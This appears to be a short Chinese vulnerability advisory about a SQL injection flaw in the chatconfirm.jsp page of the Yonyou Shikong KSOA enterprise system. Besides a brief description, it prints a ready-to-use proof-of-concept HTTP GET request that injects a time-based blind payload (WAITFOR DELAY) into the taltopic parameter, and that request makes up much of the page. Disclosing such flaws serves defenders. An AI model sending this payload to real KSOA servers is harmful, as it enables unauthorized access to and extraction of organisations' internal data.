用友-时空KSOA chatconfirm 存在SQL注入漏洞

日期: 2025-12-19 | 影响软件: 用友时空KSOA | POC: 已公开

漏洞描述

用友-时空KSOA chatconfirm 存在SQL注入漏洞,未经授权攻击者可构造特殊请求获取系统内部数据

PoC代码

GET /luntan/chatconfirm.jsp?taltopic=%27%3bWAITFOR+DELAY+%270%3a0%3a3%27-- HTTP/1.1
Host: 

相关漏洞推荐